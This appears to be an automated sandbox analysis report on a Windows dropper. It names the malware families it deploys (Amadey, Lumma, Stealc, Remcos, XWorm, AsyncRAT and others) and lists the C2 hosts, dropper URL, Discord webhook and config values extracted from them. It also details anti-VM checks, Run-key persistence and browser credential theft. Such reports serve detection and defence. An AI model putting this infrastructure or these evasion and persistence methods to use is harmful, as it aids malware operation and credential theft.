amadey | b3e08ca856378f58f3f07e7ffb0ac11ee1953dff2063d9aed0809101940eea83

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
21/03/2025, 11:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b3e08ca856378f58f3f07e7ffb0ac11ee1953dff2063d9aed0809101940eea83.exe
Size

5.6MB
MD5

6056bdf73b602f86274694e36c296098
SHA1

516e37c7efbe7b4c4cffbbf1d3a6c6295d7dc4c2
SHA256

b3e08ca856378f58f3f07e7ffb0ac11ee1953dff2063d9aed0809101940eea83
SHA512

44381bfaa71198fb7df0bff4ed28401f31a8c7af98ac1c2246e24111381aa3e1b9960d23f5d9757e932c4f6178d574be7cd551415b48486f6b19906d3e1b2b66
SSDEEP

98304:xp37G5uKFyD/36IH2MeuFNqUrAuJSFa+NcWSxqwgtcb2OeMoZSxf7et0o:x17guKkD/KI2Meuq0AugIOkn6colWjet

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Extracted

Family

skuld

https://discordapp.com/api/webhooks/1349647136895012916/qSys_fpsL_y7usKH_AyrFupSjzSsVfg2t895g2HV8Yz72asrwCIsHaqqhPtDFjz8g8_E

Extracted

Family

lumma

https://codxefusion.top/api

https://hardswarehub.today/api

https://pgadgethgfub.icu/api

https://hardrwarehaven.run/api

https://techmindzs.live/api

https://bz2ncodxefusion.top/api

https://quietswtreams.life/api

https://techspherxe.top/api

https://earthsymphzony.today/api

Extracted

Family

asyncrat

Version

Venom Pwn3rzs' Edtition v6.0.1

Botnet

V-lg60

37.48.64.102:4950

Mutex

yawyrgpacvfvsfgbz

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

remcos

Botnet

TL-60

dico.on-the-web.tv:3950

dr.is-gone.com:3950

dyndico.from-il.com:3950

nvdiemozess.broke-it.net:3950

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-Q5105M
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

xworm

Version

5.0

imagine.here-for-more.info:3960

neverdiedico.mypets.ws:3960

nvdiemosole.broke-it.net:3960

37.48.64.102:3960

Mutex

Y1BJNoYWQwOTPHJp

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

lumma

https://codxefusion.top/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/32-974-0x0000000000970000-0x0000000000980000-memory.dmp	family_xworm

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos
Skuld family
skuld
Skuld stealer
An info stealer written in Go lang.
stealer skuld
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
Zloader family
zloader
Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
trojan botnet zloader

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x000c00000002417e-347.dat	family_asyncrat

Detected Nirsoft tools 4 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral1/memory/6388-1057-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/4588-1048-0x0000000000400000-0x000000000047D000-memory.dmp	Nirsoft
behavioral1/memory/4588-1047-0x0000000000400000-0x000000000047D000-memory.dmp	Nirsoft
behavioral1/memory/4672-1060-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	87ae08f5df.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1Q31F6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempW8VK0EB6ZLWNVWYGZNRA2XZTMPLZREHL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	c0355d9ef7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	564133c059.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2h9290.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3z97M.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	feb0b1ca26.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f7a9b0d3cf.exe

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/4672-1060-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 2 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/4588-1048-0x0000000000400000-0x000000000047D000-memory.dmp	WebBrowserPassView
behavioral1/memory/4588-1047-0x0000000000400000-0x000000000047D000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 5 IoCs

flow	pid	Process
52	940	powershell.exe
70	4128	powershell.exe
174	8060	powershell.exe
176	8060	powershell.exe
201	8060	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 31 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
940	powershell.exe
4128	powershell.exe
7752	powershell.exe
8060	powershell.exe
1864	powershell.exe
4216	powershell.exe
3168	powershell.exe
3272	powershell.exe
3592	powershell.exe
6448	powershell.exe
4500	powershell.exe
4752	powershell.exe
5624	powershell.exe
4580	powershell.exe
6428	powershell.exe
6608	powershell.exe
4720	powershell.exe
2080	powershell.exe
6616	powershell.exe
6524	powershell.exe
6788	powershell.exe
2548	powershell.exe
2928	powershell.exe
3124	powershell.exe
6272	powershell.exe
6584	powershell.exe
7152	powershell.exe
2976	powershell.exe
4200	powershell.exe
4972	powershell.exe
5052	powershell.exe

Downloads MZ/PE file 23 IoCs

flow	pid	Process
48	3572	futors.exe
288	4820	rapes.exe
288	4820	rapes.exe
70	4128	powershell.exe
291	6336	svchost.exe
118	3572	futors.exe
128	4820	rapes.exe
150	4820	rapes.exe
249	4768	svchost015.exe
29	4820	rapes.exe
52	940	powershell.exe
247	4820	rapes.exe
261	4820	rapes.exe
270	1280	svchost015.exe
31	4820	rapes.exe
34	4820	rapes.exe
34	4820	rapes.exe
34	4820	rapes.exe
34	4820	rapes.exe
255	7020	svchost.exe
255	7020	svchost.exe
56	3572	futors.exe
87	3572	futors.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\rPpiJF9D_8028\ImagePath = "\\??\\C:\\Windows\\Temp\\rPpiJF9D_8028.sys"	putty.exe

Uses browser remote debugging 2 TTPs 6 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
6912	Chrome.exe
7432	Chrome.exe
7424	Chrome.exe
5392	msedge.exe
5720	msedge.exe
6436	msedge.exe

Checks BIOS information in registry 2 TTPs 26 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	564133c059.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	564133c059.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1Q31F6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2h9290.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	feb0b1ca26.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2h9290.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	c0355d9ef7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	87ae08f5df.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	87ae08f5df.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3z97M.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempW8VK0EB6ZLWNVWYGZNRA2XZTMPLZREHL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempW8VK0EB6ZLWNVWYGZNRA2XZTMPLZREHL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	feb0b1ca26.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f7a9b0d3cf.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f7a9b0d3cf.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1Q31F6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3z97M.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	c0355d9ef7.exe

Checks computer location settings 2 TTPs 15 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	sbasnekg.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	futors.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	XtDrivers.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	RtDrivers.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	slsggeii.icm
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	1Q31F6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	Build_today.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 63 IoCs

pid	Process
5652	z1E22.exe
3500	1Q31F6.exe
4820	rapes.exe
5008	2h9290.exe
4440	3z97M.exe
3952	50KfF6O.exe
1064	amnew.exe
3572	futors.exe
5356	1177e54c4b.exe
1584	cronikxqqq.exe
1168	cronikxqqq.exe
2428	TempW8VK0EB6ZLWNVWYGZNRA2XZTMPLZREHL.EXE
812	v7942.exe
5644	qNEBT6e.exe
5236	alex1212.exe
5356	cidQ6US.exe
4196	483d2fa8a0d53818306efeb32d3.exe
3088	Build_today.exe
4336	RtDrivers.exe
1728	VLPDrivers.exe
5772	XtDrivers.exe
4072	oFkpQ36.exe
4668	c0355d9ef7.exe
676	JZimOyf.exe
5660	slsggeii.icm
5604	sbasnekg.exe
5256	futors.exe
3460	rapes.exe
4768	svchost015.exe
4840	Jump%202.exe
1524	feb0b1ca26.exe
4200	RegSvcs.exe
32	RegSvcs.exe
2116	Chrome_boostrap.exe
3288	f7a9b0d3cf.exe
7088	564133c059.exe
7176	d7997010a3.exe
3308	02530fe7f9.exe
1280	svchost015.exe
1928	Jump%202.exe
5728	JZimOyf.exe
1716	oFkpQ36.exe
7952	cidQ6US.exe
6464	50KfF6O.exe
672	futors.exe
5552	rapes.exe
8024	laf6w_001.exe
8028	putty.exe
6272	repare.exe
13192	WUx3y70.exe
7100	firefox.exe
7076	firefox.exe
7112	tor.exe
752	firefox.exe
7544	firefox.exe
7016	tor.exe
5840	WUx3y70.exe
8144	firefox.exe
4752	firefox.exe
8128	e4377546ac.exe
4516	c80.exe
8392	hvix64.exe
24132	87ae08f5df.exe

Identifies Wine through registry keys 2 TTPs 13 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	3z97M.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	TempW8VK0EB6ZLWNVWYGZNRA2XZTMPLZREHL.EXE
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	c0355d9ef7.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	feb0b1ca26.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	f7a9b0d3cf.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	564133c059.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	87ae08f5df.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	1Q31F6.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	2h9290.exe

Loads dropped DLL 42 IoCs

pid	Process
7100	firefox.exe
7100	firefox.exe
7100	firefox.exe
7100	firefox.exe
7100	firefox.exe
7100	firefox.exe
7076	firefox.exe
7076	firefox.exe
7076	firefox.exe
7076	firefox.exe
7076	firefox.exe
7076	firefox.exe
7076	firefox.exe
7076	firefox.exe
7076	firefox.exe
7076	firefox.exe
752	firefox.exe
7544	firefox.exe
7544	firefox.exe
7544	firefox.exe
7544	firefox.exe
7544	firefox.exe
7544	firefox.exe
7544	firefox.exe
7544	firefox.exe
7544	firefox.exe
7544	firefox.exe
8144	firefox.exe
8144	firefox.exe
8144	firefox.exe
8144	firefox.exe
8144	firefox.exe
4752	firefox.exe
4752	firefox.exe
4752	firefox.exe
4752	firefox.exe
4752	firefox.exe
4752	firefox.exe
4752	firefox.exe
4752	firefox.exe
4752	firefox.exe
4752	firefox.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	recover.exe

Adds Run key to start application 2 TTPs 17 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	z1E22.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsDrivers = "c:\\gmue\\SBASNE~1.EXE c:\\gmue\\MIAN~1.DOC"	sbasnekg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	50KfF6O.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1177e54c4b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10285330101\\1177e54c4b.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysSet.exe = "C:\\Users\\Admin\\AppData\\Roaming\\SysSet.exe.exe"	MSBuild.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	d7997010a3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{7A55DF5F-B787-410E-B813-3F92B965D88B} = "C:\\ProgramData\\{2C9BDF40-8A30-43B8-AA3F-CCC4A8139EA3}\\icsunattend.exe {7B08923F-A548-4CEA-8B5E-93E4501761D8}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{7A55DF5F-B787-410E-B813-3F92B965D88B} = "C:\\ProgramData\\{2C9BDF40-8A30-43B8-AA3F-CCC4A8139EA3}\\icsunattend.exe {7B08923F-A548-4CEA-8B5E-93E4501761D8}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	b3e08ca856378f58f3f07e7ffb0ac11ee1953dff2063d9aed0809101940eea83.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10285340121\\am_no.cmd"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\feb0b1ca26.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10034610101\\feb0b1ca26.exe"	futors.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{CC9F6AE4-C561-4712-8F69-D15B2AF04FF5} = "C:\\ProgramData\\{257326AB-6419-4627-8D6A-3755A42F4297}\\netbtugc.exe {A6345B22-A058-44DC-BE0A-75B104EE240E}"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\329E4DB54035D66F\\firefox.exe"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	50KfF6O.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c0355d9ef7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10034600101\\c0355d9ef7.exe"	futors.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsDrivers = "C:\\Users\\Admin\\AppData\\Roaming\\lbaa\\SLSGGE~1.EXE C:\\Users\\Admin\\AppData\\Roaming\\lbaa\\ofkueqhk.pdf"	slsggeii.icm
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{CC9F6AE4-C561-4712-8F69-D15B2AF04FF5} = "C:\\ProgramData\\{257326AB-6419-4627-8D6A-3755A42F4297}\\netbtugc.exe {A6345B22-A058-44DC-BE0A-75B104EE240E}"	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
173	bitbucket.org
174	bitbucket.org
127	raw.githubusercontent.com
128	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
139	ip-api.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0007000000024315-90.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs

pid	Process
3500	1Q31F6.exe
4820	rapes.exe
5008	2h9290.exe
4440	3z97M.exe
2428	TempW8VK0EB6ZLWNVWYGZNRA2XZTMPLZREHL.EXE
4196	483d2fa8a0d53818306efeb32d3.exe
4668	c0355d9ef7.exe
3460	rapes.exe
1524	feb0b1ca26.exe
3288	f7a9b0d3cf.exe
7088	564133c059.exe
5552	rapes.exe
24132	87ae08f5df.exe

Suspicious use of SetThreadContext 20 IoCs

description	pid	Process	procid_target
PID 1584 set thread context of 1168	1584	cronikxqqq.exe	107
PID 5644 set thread context of 3772	5644	qNEBT6e.exe	129
PID 5236 set thread context of 5016	5236	alex1212.exe	136
PID 5356 set thread context of 6004	5356	cidQ6US.exe	141
PID 4072 set thread context of 2104	4072	oFkpQ36.exe	154
PID 4668 set thread context of 4768	4668	c0355d9ef7.exe	191
PID 4840 set thread context of 2024	4840	Jump%202.exe	206
PID 5660 set thread context of 4200	5660	slsggeii.icm	214
PID 5604 set thread context of 32	5604	sbasnekg.exe	216
PID 4200 set thread context of 4588	4200	RegSvcs.exe	234
PID 4200 set thread context of 4672	4200	RegSvcs.exe	235
PID 4200 set thread context of 6388	4200	RegSvcs.exe	236
PID 3308 set thread context of 4212	3308	02530fe7f9.exe	250
PID 7088 set thread context of 1280	7088	564133c059.exe	252
PID 1928 set thread context of 948	1928	Jump%202.exe	268
PID 8060 set thread context of 6960	8060	powershell.exe	273
PID 1716 set thread context of 5568	1716	oFkpQ36.exe	285
PID 7952 set thread context of 7640	7952	cidQ6US.exe	288
PID 7020 set thread context of 4548	7020	svchost.exe	320
PID 8128 set thread context of 6668	8128	e4377546ac.exe	319

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000a000000024300-48.dat	upx
behavioral1/memory/3952-58-0x0000000000F50000-0x00000000019DE000-memory.dmp	upx
behavioral1/memory/3952-60-0x0000000000F50000-0x00000000019DE000-memory.dmp	upx
behavioral1/memory/6464-1985-0x0000000000940000-0x00000000013CE000-memory.dmp	upx
behavioral1/memory/6464-1987-0x0000000000940000-0x00000000013CE000-memory.dmp	upx

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\Application\Chrome_boostrap.exe	MSBuild.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	1Q31F6.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
5816	1584	WerFault.exe	106

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	firefox.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	firefox.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b3e08ca856378f58f3f07e7ffb0ac11ee1953dff2063d9aed0809101940eea83.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	483d2fa8a0d53818306efeb32d3.exe
